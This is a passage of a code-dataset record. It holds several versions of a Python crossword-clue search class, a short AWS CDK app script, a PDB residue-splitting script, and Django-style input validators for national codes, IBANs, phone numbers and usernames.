range(0, 5):\n if self.answers[rowIn][col] != '-':\n answer = answer + self.answers[rowIn][col]\n self.domains['down'][down] = self.domains['down'][down\n ] + ' ' + 
answer\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Scraping:\n\n def __init__(self, clues, answers, gridIndex):\n self.clues = clues\n self.domains = {'across': {}, 'down': {}}\n self.answers = answers\n self.gridIndex = gridIndex\n\n def setDomains(self):\n for down in self.clues['down']:\n self.domains['down'][down] = self.search(self.clues['down'][down])\n for across in self.clues['across']:\n self.domains['across'][across] = self.search(self.clues[\n 'across'][across])\n <mask token>\n\n def search(self, clue):\n domain = set()\n wiki_set = set()\n synonym_set = set()\n toSearch = clue\n \"\"\"\n print(\"Google search for:\", toSearch)\n try:\n domain = domain + self.getGoogle(toSearch)\n except:\n print(\"An exception occurred\")\n \"\"\"\n print('Wikipedia search for:', toSearch)\n try:\n wiki_set = wiki_set | self.getWiki(toSearch)\n except:\n print('An exception occurred')\n print('Synonym search from Datamuse and Merriam-Webster for:', toSearch\n )\n try:\n synonym_set = synonym_set | self.getSynonyms(toSearch)\n except:\n print('An exception occurred')\n \"\"\"\n print(\"Merriam Webster search for:\", toSearch)\n try:\n merriam_set = merriam_set | self.getMerriam(toSearch)\n except:\n print(\"An exception occurred\")\n \"\"\"\n domain = domain.union(wiki_set, synonym_set)\n return ' '.join(str(e) for e in domain)\n\n def getGoogle(self, toSearch):\n return 'toSearch'\n\n def getWiki(self, toSearch):\n return searchWikipedia(toSearch)\n\n def getMerriam(self, toSearch):\n return searchMerriamWebster(toSearch)\n\n def getSynonyms(self, toSearch):\n return searchSynonyms(toSearch, self.clues['across'], self.clues[\n 'down'])\n\n def cheat(self):\n for across in self.clues['across']:\n for row in range(0, 5):\n for col in range(0, 5):\n if self.gridIndex[row][col] == across:\n answer = ''\n for colIn in range(0, 5):\n if self.answers[row][colIn] != '-':\n answer = answer + self.answers[row][colIn]\n self.domains['across'][across] = self.domains['across'\n ][across] + ' ' + 
answer\n for down in self.clues['down']:\n for row in range(0, 5):\n for col in range(0, 5):\n if self.gridIndex[row][col] == down:\n answer = ''\n for rowIn in range(0, 5):\n if self.answers[rowIn][col] != '-':\n answer = answer + self.answers[rowIn][col]\n self.domains['down'][down] = self.domains['down'][down\n ] + ' ' + answer\n\n\n<mask token>\n",
"step-4": "from getMerriamWebster import searchMerriamWebster\nfrom searchWikipedia import searchWikipedia\nfrom synonyms import searchSynonyms\n\n\nclass Scraping:\n\n def __init__(self, clues, answers, gridIndex):\n self.clues = clues\n self.domains = {'across': {}, 'down': {}}\n self.answers = answers\n self.gridIndex = gridIndex\n\n def setDomains(self):\n for down in self.clues['down']:\n self.domains['down'][down] = self.search(self.clues['down'][down])\n for across in self.clues['across']:\n self.domains['across'][across] = self.search(self.clues[\n 'across'][across])\n\n def getClueList(self, clue):\n clueList = [clue]\n return clueList\n\n def search(self, clue):\n domain = set()\n wiki_set = set()\n synonym_set = set()\n toSearch = clue\n \"\"\"\n print(\"Google search for:\", toSearch)\n try:\n domain = domain + self.getGoogle(toSearch)\n except:\n print(\"An exception occurred\")\n \"\"\"\n print('Wikipedia search for:', toSearch)\n try:\n wiki_set = wiki_set | self.getWiki(toSearch)\n except:\n print('An exception occurred')\n print('Synonym search from Datamuse and Merriam-Webster for:', toSearch\n )\n try:\n synonym_set = synonym_set | self.getSynonyms(toSearch)\n except:\n print('An exception occurred')\n \"\"\"\n print(\"Merriam Webster search for:\", toSearch)\n try:\n merriam_set = merriam_set | self.getMerriam(toSearch)\n except:\n print(\"An exception occurred\")\n \"\"\"\n domain = domain.union(wiki_set, synonym_set)\n return ' '.join(str(e) for e in domain)\n\n def getGoogle(self, toSearch):\n return 'toSearch'\n\n def getWiki(self, toSearch):\n return searchWikipedia(toSearch)\n\n def getMerriam(self, toSearch):\n return searchMerriamWebster(toSearch)\n\n def getSynonyms(self, toSearch):\n return searchSynonyms(toSearch, self.clues['across'], self.clues[\n 'down'])\n\n def cheat(self):\n for across in self.clues['across']:\n for row in range(0, 5):\n for col in range(0, 5):\n if self.gridIndex[row][col] == across:\n answer = ''\n for colIn 
in range(0, 5):\n if self.answers[row][colIn] != '-':\n answer = answer + self.answers[row][colIn]\n self.domains['across'][across] = self.domains['across'\n ][across] + ' ' + answer\n for down in self.clues['down']:\n for row in range(0, 5):\n for col in range(0, 5):\n if self.gridIndex[row][col] == down:\n answer = ''\n for rowIn in range(0, 5):\n if self.answers[rowIn][col] != '-':\n answer = answer + self.answers[rowIn][col]\n self.domains['down'][down] = self.domains['down'][down\n ] + ' ' + answer\n\n\n<mask token>\n",
"step-5": "from getMerriamWebster import searchMerriamWebster\nfrom searchWikipedia import searchWikipedia\nfrom synonyms import searchSynonyms\n\nclass Scraping:\n def __init__(self, clues, answers, gridIndex):\n self.clues = clues\n self.domains = {\"across\": {}, \"down\":{}}\n self.answers = answers\n self.gridIndex = gridIndex\n\n def setDomains(self):\n for down in self.clues[\"down\"]:\n self.domains[\"down\"][down] = self.search(self.clues[\"down\"][down])\n for across in self.clues[\"across\"]:\n self.domains[\"across\"][across] = self.search(self.clues[\"across\"][across])\n #======================== CHEAT =============================\n #self.cheat()\n\n def getClueList(self, clue):\n clueList = [clue]\n return clueList\n\n def search(self, clue):\n domain = set()\n wiki_set = set()\n synonym_set = set()\n toSearch = clue\n \"\"\"\n print(\"Google search for:\", toSearch)\n try:\n domain = domain + self.getGoogle(toSearch)\n except:\n print(\"An exception occurred\")\n \"\"\"\n print(\"Wikipedia search for:\", toSearch)\n try:\n\n wiki_set = wiki_set | self.getWiki(toSearch)\n except:\n print(\"An exception occurred\")\n \n print(\"Synonym search from Datamuse and Merriam-Webster for:\", toSearch)\n try:\n synonym_set = synonym_set | self.getSynonyms(toSearch)\n except:\n print(\"An exception occurred\")\n \n \"\"\"\n print(\"Merriam Webster search for:\", toSearch)\n try:\n merriam_set = merriam_set | self.getMerriam(toSearch)\n except:\n print(\"An exception occurred\")\n \"\"\" \n domain = domain.union(wiki_set, synonym_set)\n return ' '.join(str(e) for e in domain) #''.join(str(e) for e in words)\n\n def getGoogle(self, toSearch):\n\n return \"toSearch\"\n\n def getWiki(self, toSearch):\n return searchWikipedia(toSearch)\n\n def getMerriam(self,toSearch):\n return searchMerriamWebster(toSearch)\n\n def getSynonyms(self, toSearch):\n return searchSynonyms(toSearch, self.clues[\"across\"], self.clues[\"down\"])\n\n def cheat(self):\n for across in 
self.clues[\"across\"]:\n \n for row in range(0,5):\n for col in range(0,5):\n if self.gridIndex[row][col] == across:\n answer = \"\"\n for colIn in range(0,5):\n if self.answers[row][colIn] != \"-\":\n answer = answer + self.answers[row][colIn]\n self.domains[\"across\"][across] = self.domains[\"across\"][across] + \" \" + answer\n #print(answer)\n\n for down in self.clues[\"down\"]:\n \n for row in range(0,5):\n for col in range(0,5):\n if self.gridIndex[row][col] == down:\n answer = \"\"\n for rowIn in range(0,5):\n if self.answers[rowIn][col] != \"-\":\n answer = answer + self.answers[rowIn][col]\n self.domains[\"down\"][down] = self.domains[\"down\"][down] + \" \" + answer\n #print(answer)\n\n\n\"\"\"\nscraping = Scraping()\nscraping.setDomains()\nprint(scraping.domains)\n\"\"\"",
"step-ids": [
4,
6,
9,
11,
12
]
}
|
[
4,
6,
9,
11,
12
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
MainStack(app, app, 'main')
app.synth()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
APP_NAME = 'etl-pm-pipeline-be'
app = PMIApp(APP_NAME)
MainStack(app, app, 'main')
app.synth()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from ias_pmi_cdk_common import PMIApp
from stacks import MainStack
APP_NAME = 'etl-pm-pipeline-be'
app = PMIApp(APP_NAME)
MainStack(app, app, 'main')
app.synth()
<|reserved_special_token_1|>
"""AWS CDK application.
See https://docs.aws.amazon.com/cdk/ for details.
"""
from ias_pmi_cdk_common import PMIApp
from stacks import MainStack
APP_NAME = 'etl-pm-pipeline-be'
# create CDK application
app = PMIApp(APP_NAME)
# add stacks
MainStack(app, app, 'main')
# synthesize application assembly
app.synth()
|
flexible
|
{
"blob_id": "dfbbbaf6b5f02c60ca48f7864068d59349c547d1",
"index": 5484,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nMainStack(app, app, 'main')\napp.synth()\n",
"step-3": "<mask token>\nAPP_NAME = 'etl-pm-pipeline-be'\napp = PMIApp(APP_NAME)\nMainStack(app, app, 'main')\napp.synth()\n",
"step-4": "<mask token>\nfrom ias_pmi_cdk_common import PMIApp\nfrom stacks import MainStack\nAPP_NAME = 'etl-pm-pipeline-be'\napp = PMIApp(APP_NAME)\nMainStack(app, app, 'main')\napp.synth()\n",
"step-5": "\"\"\"AWS CDK application.\n\nSee https://docs.aws.amazon.com/cdk/ for details.\n\n\"\"\"\n\nfrom ias_pmi_cdk_common import PMIApp\n\nfrom stacks import MainStack\n\n\nAPP_NAME = 'etl-pm-pipeline-be'\n\n\n# create CDK application\napp = PMIApp(APP_NAME)\n\n# add stacks\nMainStack(app, app, 'main')\n\n# synthesize application assembly\napp.synth()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import sys
pdb = open(sys.argv[1])
name = sys.argv[2]
res = []
resid = None
for l in pdb:
if not l.startswith("ATOM"):
continue
if int(l[22:26]) != resid:
res.append([])
resid = int(l[22:26])
res[-1].append(l)
for i in range(len(res)-2):
outp = open("%s%d-%dr.pdb"%(name,i+1,i+3), "w")
for r in res[i:i+3]:
for j in r:
print >> outp, j,
|
normal
|
{
"blob_id": "d867d17b2873de7c63d0ff29eb585cce1a68dda6",
"index": 6081,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor l in pdb:\n if not l.startswith('ATOM'):\n continue\n if int(l[22:26]) != resid:\n res.append([])\n resid = int(l[22:26])\n res[-1].append(l)\nfor i in range(len(res) - 2):\n outp = open('%s%d-%dr.pdb' % (name, i + 1, i + 3), 'w')\n for r in res[i:i + 3]:\n for j in r:\n print >> outp, j\n",
"step-3": "<mask token>\npdb = open(sys.argv[1])\nname = sys.argv[2]\nres = []\nresid = None\nfor l in pdb:\n if not l.startswith('ATOM'):\n continue\n if int(l[22:26]) != resid:\n res.append([])\n resid = int(l[22:26])\n res[-1].append(l)\nfor i in range(len(res) - 2):\n outp = open('%s%d-%dr.pdb' % (name, i + 1, i + 3), 'w')\n for r in res[i:i + 3]:\n for j in r:\n print >> outp, j\n",
"step-4": "import sys\npdb = open(sys.argv[1])\nname = sys.argv[2]\nres = []\nresid = None\nfor l in pdb:\n if not l.startswith('ATOM'):\n continue\n if int(l[22:26]) != resid:\n res.append([])\n resid = int(l[22:26])\n res[-1].append(l)\nfor i in range(len(res) - 2):\n outp = open('%s%d-%dr.pdb' % (name, i + 1, i + 3), 'w')\n for r in res[i:i + 3]:\n for j in r:\n print >> outp, j\n",
"step-5": "import sys\n\npdb = open(sys.argv[1])\nname = sys.argv[2]\n\nres = []\nresid = None\nfor l in pdb:\n if not l.startswith(\"ATOM\"):\n continue\n if int(l[22:26]) != resid:\n res.append([])\n resid = int(l[22:26])\n res[-1].append(l)\n\nfor i in range(len(res)-2):\n outp = open(\"%s%d-%dr.pdb\"%(name,i+1,i+3), \"w\")\n for r in res[i:i+3]:\n for j in r:\n print >> outp, j,\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class FieldValidator:
def __init__(self, validationData={}, *args, **kwargs):
self.data = validationData
self.validationPipeline = []
self.statusCode = 200
self.errors = {}
self.invalidFields = []
def flush(self):
self = FieldValidator()
def setError(self, field, error):
if field not in self.invalidFields:
fieldErrors = self.errors.get(field, [])
if error[0] not in fieldErrors:
self.errors[field] = fieldErrors + [error[0]]
self.statusCode = error[1]
self.invalidFields.append(field)
def getErrors(self):
return self.errors
def validate(self):
for validation in self.validationPipeline:
try:
validation['validator'](validation['data'])
except:
self.setError(validation['data']['field'], enum.Error.
INVALID_FIELD_DATA.value)
return self
def addValidation(self, data, validatorFunction):
if data['value'] == 'unAssigned' and data['field'] in self.data.keys():
data['value'] = self.data[data['field']]
elif data['value'] == 'unAssigned' and data['field'
] not in self.data.keys():
data['value'] = None
self.validationPipeline.append({'data': data, 'validator':
validatorFunction})
def _check_with_typeValidator(self, data):
if not isinstance(data['value'], data['type']):
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_nationalLegalCodeValidator(self, data):
nationalLegalCode = data['value']
result = 0
validationList = [29, 27, 23, 19, 17, 29, 27, 23, 19, 17]
if len(nationalLegalCode) != 11:
self.setError(data['field'], enum.Error.
INVALID_NATIONAL_LEGAL_CODE.value)
return
for i in range(10):
result += (int(nationalLegalCode[-2]) + 2 + int(
nationalLegalCode[i])) * validationList[i]
if result % 11 == 10:
reminder = 0
else:
reminder = result % 11
if reminder == int(nationalLegalCode[-1]):
valid = True
else:
valid = False
if valid is False:
self.setError(data['field'], enum.Error.
INVALID_NATIONAL_LEGAL_CODE.value)
<|reserved_special_token_0|>
def _check_with_officer1NationalCodeValidator(self, data):
nCode = data['value']
valid = True
if len(nCode) != 10:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
return
sum = 0
for i in range(9):
sum += int(nCode[i]) * (10 - i)
r = sum % 11
if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):
valid = valid and True
if valid is False:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_officer2NationalCodeValidator(self, data):
nCode = data['value']
valid = True
if len(nCode) != 10:
valid = False
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
return
sum = 0
for i in range(9):
sum += int(nCode[i]) * (10 - i)
r = sum % 11
if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):
valid = valid and True
if valid is False:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_featuresValidator(self, data):
for i in data['value']:
if i not in ['پلتفرم پرداخت در محل', 'باشگاه مشتریان',
'درگاه پرداخت اینترنتی']:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.
value)
break
def _check_with_userNameValidator(self, data):
username = re.match('^[A-Za-z]+(?:[ _-][A-Za-z0-9]+)*$', data['value'])
if 'admin' in data['value'] or 'zibal' in data['value'
] or username is None:
self.setError(data['field'], enum.Error.INVALID_USERNAME.value)
def _check_with_phoneNumberValidator(self, data):
if data['value'] is None or len(data) < 1:
self.setError(data['field'], enum.Error.
PHONE_INCORRECT_TEMPLATE.value)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def _check_with_fileValidator(self, data):
file = data['value']
field = data['field']
if file is None:
self.setError(field, enum.Error.EMPTY_INPUT_FIELD.value)
return
elif file.size > enum.Limits.FILE_SIZE_LIMIT.value:
self.setError(field, enum.Error.FILE_SIZE_EXCEED.value)
types = data['options'].get('types', None)
valid = False
if types is not None:
for type in types:
valid = valid or type in file.content_type
if valid is False:
self.setError(field, enum.Error.REQUEST_TYPE_ERROR.value)
<|reserved_special_token_0|>
def _check_with_subMerchantBankAccountValidator(self, data):
if not SubMerchant.objects.filter(idsql=data['value']['userId'], ID
=data['value']['subId'], status=1).exists():
self.setError(data['field'], enum.Error.
IMPOSSIBLE_BANK_ACCOUNT_DESTINATION.value)
def _check_with_minDataLengthValidator(self, data):
if data['value'] is None or len(data['value']) < data['length']:
self.setError(data['field'], (enum.Error.
MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),
enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))
def _check_with_maxDataLengthValidator(self, data):
if data['value'] is None or len(data['value']) > data['length']:
self.setError(data['field'], (enum.Error.
MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),
enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))
def _check_with_equalDataLengthValidator(self, data):
if data['value'] is None or len(data['value']) != data['length']:
self.setError(data['field'], (enum.Error.
MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),
enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))
def _check_with_inputValidator(self, data):
if data['value'] is None or len(data['value']) < 1:
self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)
def _check_with_IbanTransferable(self, data):
if data['value'][4:7] == '062' and data['value'][-13:-10] == '080':
self.setError(data['field'], enum.Error.NOT_IBAN_TRANSFERABLE.value
)
def _check_with_username(self, data):
username = re.match('^[a-zA-Z0-9_.-]+$', data['value'])
if username is None:
self.setError(data['field'], enum.Error.INVALID_USERNAME.value)
def checkType(self, field, type, value='unAssigned'):
self.addValidation({'field': field, 'type': type, 'value': value},
self._check_with_typeValidator)
return self
def checkNationalLegalCode(self, field, code='unAssigned'):
self.addValidation({'field': field, 'value': code}, self.
_check_with_nationalLegalCodeValidator)
return self
def checkOfficer1NationalCode(self, field, code='unAssigned'):
self.addValidation({'field': field, 'value': code}, self.
_check_with_officer1NationalCodeValidator)
return self
def checkOfficer2NationalCode(self, field, code='unAssigned'):
self.addValidation({'field': field, 'value': code}, self.
_check_with_officer2NationalCodeValidator)
return self
def checkNationalCode(self, field, code='unAssigned'):
self.addValidation({'field': field, 'value': code}, self.
_check_with_nationalCodeValidator)
return self
def checkFeatures(self, field, features='unAssigned'):
self.addValidation({'field': field, 'value': features}, self.
_check_with_featuresValidator)
return self
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def checkEmail(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_emailValidator)
return self
def checkNotNone(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_noneValidator)
return self
def checkFile(self, field, data, **options):
self.addValidation({'field': field, 'value': data, 'options':
options}, self._check_with_fileValidator)
return self
def checkIBAN(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_IBANValidator)
return self
def checkBankAccountDestinationForSubmerchant(self, field, userId, subId):
data = {'userId': userId, 'subId': subId}
self.addValidation({'field': field, 'value': data}, self.
_check_with_subMerchantBankAccountValidator)
return self
def checkDataLength(self, field, length, mode='equal', data='unAssigned'):
if mode == 'equal':
validatorFunction = self._check_with_equalDataLengthValidator
if mode == 'min':
validatorFunction = self._check_with_minDataLengthValidator
if mode == 'max':
validatorFunction = self._check_with_minDataLengthValidator
self.addValidation({'field': field, 'value': data, 'length': length
}, validatorFunction)
return self
def checkInputData(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_inputValidator)
return self
<|reserved_special_token_0|>
def checkIsIbanTransferable(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_IbanTransferable)
return self
<|reserved_special_token_0|>
class DataValidator:
def __init__(self, data={}):
self.fieldValidator = FieldValidator(data)
self.objectValidator = ObjectValidator()
self.errors = {}
self.statusCode = 200
def getValidatorsErrors(self):
self.objectValidator.validate()
self.fieldValidator.validate()
for key in self.fieldValidator.getErrors().keys():
self.errors[key] = self.errors.get(key, []
) + self.fieldValidator.getErrors()[key]
self.statusCode = self.fieldValidator.statusCode
for key in self.objectValidator.getErrors().keys():
self.errors[key] = self.errors.get(key, []
) + self.objectValidator.getErrors()[key]
self.statusCode = (self.objectValidator.statusCode if self.
objectValidator.statusCode != 200 else self.statusCode)
return self.errors
def generateMessage(self):
messages = []
errorKeys = self.errors.keys()
if 'email' in errorKeys:
messages.append(' آدرس ایمیل نامعتبر است')
if 'name' in errorKeys:
messages.append('نام را وارد کنید')
if 'username' in errorKeys:
messages.append('نام کاربری را وارد کنید')
if 'password' in errorKeys:
messages.append('رمز عبور را وارد کنید')
if 'mobile' in errorKeys:
messages.append('تلفن همراه خود را وارد کنید.')
if 'phone' in errorKeys:
messages.append(
'تلفن ثابت را به فرمت 02122407556 و 11 رقمی وارد کنید')
if 'iban' in errorKeys or 'IBAN' in errorKeys:
messages.append(
'شماره شبای وارد شده معتبر نیست. 26 کاراکتر و شروع با IR و بدون خط تیره (-) و فاصله'
)
if 'user' in errorKeys:
messages.append('لطفا وارد شوید')
return messages
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ObjectValidator:
def __init__(self, validationData={}, *args, **kwargs):
self.data = validationData
self.statusCode = 200
self.validationPipeline = []
self.errors = {}
self.invalidFields = []
def flush(self):
self = ObjectValidator()
return self
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def addValidation(self, data, validatorFunction):
self.validationPipeline.append({'data': data, 'validator':
validatorFunction})
def _check_with_authenticationValidator(self, data):
if not data['user'].is_authenticated:
self.setError(data['field'], enum.Error.UNAUTHORIZED.value)
<|reserved_special_token_0|>
def _check_with_ObjectExistenceValidator(self, data):
model = data['model']
if not model.objects.filter(**data['filter']):
self.setError(data['field'], enum.Error.
GENERIC_OBJECT_NOT_FOUND.value)
<|reserved_special_token_0|>
def checkObjectExistence(self, field, model, **filter):
self.addValidation({'field': field, 'model': model, 'filter':
filter}, self._check_with_ObjectExistenceValidator)
return self
def checkUserAuthentication(self, field, user):
self.addValidation({'field': field, 'user': user}, self.
_check_with_authenticationValidator)
return self
class FieldValidator:
def __init__(self, validationData={}, *args, **kwargs):
self.data = validationData
self.validationPipeline = []
self.statusCode = 200
self.errors = {}
self.invalidFields = []
def flush(self):
self = FieldValidator()
def setError(self, field, error):
if field not in self.invalidFields:
fieldErrors = self.errors.get(field, [])
if error[0] not in fieldErrors:
self.errors[field] = fieldErrors + [error[0]]
self.statusCode = error[1]
self.invalidFields.append(field)
def getErrors(self):
return self.errors
def validate(self):
for validation in self.validationPipeline:
try:
validation['validator'](validation['data'])
except:
self.setError(validation['data']['field'], enum.Error.
INVALID_FIELD_DATA.value)
return self
def addValidation(self, data, validatorFunction):
if data['value'] == 'unAssigned' and data['field'] in self.data.keys():
data['value'] = self.data[data['field']]
elif data['value'] == 'unAssigned' and data['field'
] not in self.data.keys():
data['value'] = None
self.validationPipeline.append({'data': data, 'validator':
validatorFunction})
def _check_with_typeValidator(self, data):
if not isinstance(data['value'], data['type']):
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_nationalLegalCodeValidator(self, data):
nationalLegalCode = data['value']
result = 0
validationList = [29, 27, 23, 19, 17, 29, 27, 23, 19, 17]
if len(nationalLegalCode) != 11:
self.setError(data['field'], enum.Error.
INVALID_NATIONAL_LEGAL_CODE.value)
return
for i in range(10):
result += (int(nationalLegalCode[-2]) + 2 + int(
nationalLegalCode[i])) * validationList[i]
if result % 11 == 10:
reminder = 0
else:
reminder = result % 11
if reminder == int(nationalLegalCode[-1]):
valid = True
else:
valid = False
if valid is False:
self.setError(data['field'], enum.Error.
INVALID_NATIONAL_LEGAL_CODE.value)
def _check_with_nationalCodeValidator(self, data):
nCode = data['value']
valid = True
if len(nCode) != 10:
valid = False
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
return
sum = 0
for i in range(9):
sum += int(nCode[i]) * (10 - i)
r = sum % 11
if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):
valid = valid and True
if valid is False:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_officer1NationalCodeValidator(self, data):
nCode = data['value']
valid = True
if len(nCode) != 10:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
return
sum = 0
for i in range(9):
sum += int(nCode[i]) * (10 - i)
r = sum % 11
if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):
valid = valid and True
if valid is False:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_officer2NationalCodeValidator(self, data):
nCode = data['value']
valid = True
if len(nCode) != 10:
valid = False
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
return
sum = 0
for i in range(9):
sum += int(nCode[i]) * (10 - i)
r = sum % 11
if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):
valid = valid and True
if valid is False:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_featuresValidator(self, data):
for i in data['value']:
if i not in ['پلتفرم پرداخت در محل', 'باشگاه مشتریان',
'درگاه پرداخت اینترنتی']:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.
value)
break
def _check_with_userNameValidator(self, data):
username = re.match('^[A-Za-z]+(?:[ _-][A-Za-z0-9]+)*$', data['value'])
if 'admin' in data['value'] or 'zibal' in data['value'
] or username is None:
self.setError(data['field'], enum.Error.INVALID_USERNAME.value)
def _check_with_phoneNumberValidator(self, data):
if data['value'] is None or len(data) < 1:
self.setError(data['field'], enum.Error.
PHONE_INCORRECT_TEMPLATE.value)
def _check_with_mobileValidator(self, data):
mobileNumber = data['value']
if mobileNumber is None:
self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)
return
match_object = re.match('(^09[0-9]{9}$)', mobileNumber)
if match_object is None or mobileNumber is None:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_emailValidator(self, data):
email = data['value']
if email is None:
self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)
return
match_object = re.match(
'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$)', email)
if match_object is None or email is None:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_noneValidator(self, data):
if data['value'] is None or data['value'] == '':
self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)
def _check_with_fileValidator(self, data):
file = data['value']
field = data['field']
if file is None:
self.setError(field, enum.Error.EMPTY_INPUT_FIELD.value)
return
elif file.size > enum.Limits.FILE_SIZE_LIMIT.value:
self.setError(field, enum.Error.FILE_SIZE_EXCEED.value)
types = data['options'].get('types', None)
valid = False
if types is not None:
for type in types:
valid = valid or type in file.content_type
if valid is False:
self.setError(field, enum.Error.REQUEST_TYPE_ERROR.value)
def _check_with_IBANValidator(self, data):
iban = data['value']
if len(iban) != 26 or not iban.startswith('IR'):
self.setError(data['field'], enum.Error.IBAN_ERROR.value)
return
code = iban[4:] + iban[:4]
code = code.replace('I', '18').replace('R', '27')
if int(code) % 97 != 1:
self.setError(data['field'], enum.Error.IBAN_ERROR.value)
def _check_with_subMerchantBankAccountValidator(self, data):
if not SubMerchant.objects.filter(idsql=data['value']['userId'], ID
=data['value']['subId'], status=1).exists():
self.setError(data['field'], enum.Error.
IMPOSSIBLE_BANK_ACCOUNT_DESTINATION.value)
def _check_with_minDataLengthValidator(self, data):
if data['value'] is None or len(data['value']) < data['length']:
self.setError(data['field'], (enum.Error.
MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),
enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))
    def _check_with_maxDataLengthValidator(self, data):
        # Fails when the value is missing or longer than data['length'].
        # NOTE(review): reuses the "insufficient length" message for the
        # over-length case — confirm the wording is intended.
        if data['value'] is None or len(data['value']) > data['length']:
            self.setError(data['field'], (enum.Error.
                MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),
                enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))
    def _check_with_equalDataLengthValidator(self, data):
        # Fails unless the value's length is exactly data['length'].
        if data['value'] is None or len(data['value']) != data['length']:
            self.setError(data['field'], (enum.Error.
                MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),
                enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))
def _check_with_inputValidator(self, data):
if data['value'] is None or len(data['value']) < 1:
self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)
    def _check_with_IbanTransferable(self, data):
        # Rejects IBANs whose chars 4-6 are '062' and chars -13..-11 are
        # '080'. NOTE(review): these look like bank/branch identifiers —
        # confirm which institutions they denote before changing this rule.
        if data['value'][4:7] == '062' and data['value'][-13:-10] == '080':
            self.setError(data['field'], enum.Error.NOT_IBAN_TRANSFERABLE.value
                )
def _check_with_username(self, data):
username = re.match('^[a-zA-Z0-9_.-]+$', data['value'])
if username is None:
self.setError(data['field'], enum.Error.INVALID_USERNAME.value)
    def checkType(self, field, type, value='unAssigned'):
        # Queue an isinstance() check for `field`; returns self for chaining.
        self.addValidation({'field': field, 'type': type, 'value': value},
            self._check_with_typeValidator)
        return self
    def checkNationalLegalCode(self, field, code='unAssigned'):
        # Queue the legal-entity national-id checksum; returns self.
        self.addValidation({'field': field, 'value': code}, self.
            _check_with_nationalLegalCodeValidator)
        return self
    def checkOfficer1NationalCode(self, field, code='unAssigned'):
        # Queue the national-code checksum for the officer-1 field; returns self.
        self.addValidation({'field': field, 'value': code}, self.
            _check_with_officer1NationalCodeValidator)
        return self
    def checkOfficer2NationalCode(self, field, code='unAssigned'):
        # Queue the national-code checksum for the officer-2 field; returns self.
        self.addValidation({'field': field, 'value': code}, self.
            _check_with_officer2NationalCodeValidator)
        return self
    def checkNationalCode(self, field, code='unAssigned'):
        # Queue the personal national-code checksum; returns self.
        self.addValidation({'field': field, 'value': code}, self.
            _check_with_nationalCodeValidator)
        return self
    def checkFeatures(self, field, features='unAssigned'):
        # Queue the allowed-features membership check; returns self.
        self.addValidation({'field': field, 'value': features}, self.
            _check_with_featuresValidator)
        return self
    def checkUserName(self, field, username='unAssigned'):
        # Queue the display-username pattern/reserved-word check; returns self.
        # NOTE(review): distinct from checkUsername below, which uses a
        # different pattern — confirm both are intentional.
        self.addValidation({'field': field, 'value': username}, self.
            _check_with_userNameValidator)
        return self
    def checkPhone(self, field, data='unAssigned'):
        # Queue the phone-number presence check; returns self.
